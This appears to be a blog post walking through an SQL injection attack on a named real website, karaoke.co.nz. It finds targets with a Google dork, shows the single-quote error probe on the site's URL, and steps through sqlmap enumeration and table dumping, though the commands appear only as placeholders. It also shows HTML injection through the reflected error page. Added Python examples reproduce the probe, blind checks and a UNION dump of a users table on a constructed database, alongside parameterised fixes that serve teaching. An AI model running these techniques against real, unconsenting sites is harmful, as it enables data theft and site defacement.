Hack remote databases using SQL injection

in steempress •  6 years ago 


What is SQL Injection


 

SQL injection is a technique for injecting attacker-controlled SQL into a query that a website builds from untrusted input, most commonly a parameter in the URL query string. If the application concatenates that input into the SQL statement instead of validating it and binding it as a parameter, the database executes whatever the attacker appends. Using SQL injection, an attacker can read every table the application's database account can reach (credentials, customer records, configuration), tamper with or delete existing data, deface the site and, depending on the database account's privileges, read or write files on the database server. SQL injection attacks are extremely dangerous, and vulnerable websites are at high risk of leaking confidential data, which affects them as well as all of their stakeholders.

In this blog, I will show you how to find a website vulnerable to SQL injection and then exploit the vulnerability using a tool called SQLMap.

 

We are going to use Google dorks to find a vulnerable website. If you don't know what Google dorks are, please read my previous blog post on them first.

 

Let's use a simple Google dork to find candidate SQLi sites, as below:-

inurl:index.php?id=

The above returns a large number of results. None of them is vulnerable merely because it matches the dork; the pages are candidates because they take a numeric id from the query string, and any that splice that value into a SQL statement without validating it will execute whatever is injected.

 

Quick check to find SQL injection vulnerability


 

Out of the search results returned by the above Google search, I spotted a website, karaoke.co.nz, vulnerable to SQL injection. Visiting the URL http://karaoke.co.nz/items/index.php?id=37 and then appending a single quote to the end of it shows that the id parameter is not validated: the quote breaks the SQL statement, the database rejects it, and the page prints the raw database error instead of a generic message. Check this URL:-

http://karaoke.co.nz/items/index.php?id=37' which gives the below error:-

 

Unable to query local database to select Identifier
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
select * from Category where Identifier = 37'

That one message gives away three things at once: the backend is MariaDB, the id is compared as a bare number (so there is no quoting around it and quote-escaping would not have helped), and the exact query template, which is what SQLMap needs in order to build its payloads.
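To make concrete what the error above means, and what SQLMap goes on to automate, here is an added example (not code from the original post or from the karaoke.co.nz site) that reproduces the same broken pattern against an in-memory SQLite database. The table contents and the Users table are constructed for the demonstration and are assumptions, not the real site's schema; only the Category.Identifier column comes from the error message. It shows the single-quote probe producing a syntax error, the TRUE/FALSE probes SQLMap uses for blind inference, a UNION query pulling rows out of another table (the manual form of `--dump`), and the parameterised version of the same lookup that closes the hole.

```python
import re
import sqlite3

# Constructed stand-in for the site's schema (assumption: nothing beyond
# Category.Identifier is known from the page; the Users table is invented
# to have something worth dumping).
SCHEMA = """
CREATE TABLE Category (Identifier INTEGER PRIMARY KEY, Name TEXT);
INSERT INTO Category VALUES (37, 'Party hits'), (38, 'Country');
CREATE TABLE Users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
INSERT INTO Users VALUES (1, 'admin', 'not-a-real-hash');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, id_param):
    """The broken pattern behind the page's error: the raw query-string value is
    concatenated into the statement, so whoever controls ?id= controls the SQL."""
    sql = "select * from Category where Identifier = " + id_param
    try:
        return {"sql": sql, "rows": conn.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:  # SQLite's analogue of MariaDB's 1064 syntax error
        return {"sql": sql, "rows": [], "error": str(exc)}


def lookup_fixed(conn, id_param):
    """Validate the type, then bind the value; the database never parses
    attacker-supplied text as SQL."""
    if not re.fullmatch(r"[0-9]+", id_param):
        raise ValueError("id must be a non-negative integer")
    return conn.execute(
        "select * from Category where Identifier = ?", (int(id_param),)
    ).fetchall()


def probe_blind(conn, id_param):
    """The boolean inference sqlmap automates: append a TRUE and a FALSE condition
    and compare the responses. If they differ, the condition reached the database."""
    true_rows = lookup_vulnerable(conn, id_param + " AND 1=1")["rows"]
    false_rows = lookup_vulnerable(conn, id_param + " AND 1=2")["rows"]
    return true_rows != false_rows


# Manual equivalent of sqlmap's --dump: the injected SELECT must return the same
# number of columns as the original query (two here), which is why sqlmap first
# determines the column count before extracting data.
UNION_DUMP = "37 UNION ALL SELECT id, username || ':' || password_hash FROM Users"

if __name__ == "__main__":
    conn = make_db()
    print(lookup_vulnerable(conn, "37")["rows"])        # normal request
    print(lookup_vulnerable(conn, "37'")["error"])      # the single-quote probe
    print("injectable:", probe_blind(conn, "37"))       # TRUE/FALSE responses differ
    print(lookup_vulnerable(conn, UNION_DUMP)["rows"])  # rows from the other table
    print(lookup_fixed(conn, "37"))                     # parameterised lookup works
    try:
        lookup_fixed(conn, UNION_DUMP)
    except ValueError as exc:
        print("rejected:", exc)                         # payload never reaches the DB
```

The probe functions are deliberately separate from the fix: in a real assessment you only ever run the probes against a target you are authorised to test, and the fix (type validation plus a bound parameter) is what you recommend to its owner.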

 

Below is a partial dump of one of the DB tables of this site (screenshot: SQLMAP DUMP, not reproduced here):-


To use SQLMap, download and install Python first. Once done, download SQLMap (it is a Python project, published in the sqlmapproject repository on GitHub) and install it.

Once installed, go to the location where SQLMap is installed and type the below command to get familiar with SQLMap's options:

 

[gistpen id="1962"]


Use the below SQLMap commands to enumerate all the databases of the vulnerable site.

[gistpen id="1925"]
The above will return database names, claireg_karaoke and information_schema in this case. information_schema is MariaDB's built-in metadata catalogue, so the application's own data lives in claireg_karaoke.
Use the below commands to list the tables and other diagnostic data in those databases.
[gistpen id="1927"]
[gistpen id="1929"]
Once we have the table names, let's get the column names using the below commands:-

[gistpen id="1931"]

 

 

[gistpen id="1933"]
The above commands ("sqlmap-4" and "sqlmap-5") return the columns of the table specified by <table name>. Once we have all the info dumped, we can use it in whatever way we need.

Once you have the column names, you can dump their values using the below commands:-

 

[gistpen id="1955"]
It's also possible to dump everything the application's database account can read with the option --dump-all. On a large database this is slow and very noisy in the target's logs, so prefer targeting the tables you actually need.

 

What more can be done to exploit this vulnerability? Let's try to manipulate the query string and change the HTML webpage.

Since the website does not validate the query string and, as the error above shows, echoes the failing SQL statement back into the page without HTML-encoding it, we can insert an image into the HTML page simply by placing an image tag in the query string. The below link shows the exploit:-
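As an added example (not from the original post), this reproduces the reflection the paragraph above relies on, using a constructed stand-in for the site's error template (assumption: the real template is unknown, so only the behaviour visible in the quoted error message is modelled). The vulnerable renderer writes the database error and the raw query, attacker input included, into the HTML body, so a tag placed in the id parameter becomes part of the page. The fixed version logs the database error server-side, returns a generic message and HTML-escapes the one piece of user input it does reflect. A small tag collector shows the difference.

```python
import html
import logging
from html.parser import HTMLParser

LOG = logging.getLogger("items")


def build_query(id_param):
    # Same concatenation as the vulnerable lookup; used here only to build the echoed text.
    return "select * from Category where Identifier = " + id_param


def render_error_vulnerable(id_param, db_error):
    """Constructed stand-in for the site's error page: the DB error and the raw SQL
    (with the attacker's input) are written into the response unescaped."""
    return (
        "<p>Unable to query local database to select Identifier" + db_error + "</p>"
        "<pre>" + build_query(id_param) + "</pre>"
    )


def render_error_fixed(id_param, db_error):
    """Generic message to the client, detail to the server log, reflected input escaped."""
    LOG.error("lookup failed for id=%r: %s", id_param, db_error)
    return "<p>Sorry, no item matches " + html.escape(id_param, quote=True) + ".</p>"


class TagCollector(HTMLParser):
    """Records every start tag the browser would see; injected markup shows up as extra tags."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(page):
    collector = TagCollector()
    collector.feed(page)
    collector.close()
    return collector.tags


if __name__ == "__main__":
    payload = "37'<img src=x>"  # constructed: the single-quote probe plus an image tag
    err = "You have an error in your SQL syntax"
    print(tags_in(render_error_vulnerable(payload, err)))  # img tag rendered
    print(tags_in(render_error_fixed(payload, err)))       # only the template's own tag
    print(render_error_fixed(payload, err))
```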
 
 
Happy hacking !!
 
Disclaimer:- The content is for educational purposes only. Any unethical use of the information on this website is not my responsibility.
 
Like us at GolibraryIndia to get regular updates.
 

Posted from my blog with SteemPress : http://www.golibrary.co/hack-remote-databases-using-sql-injection/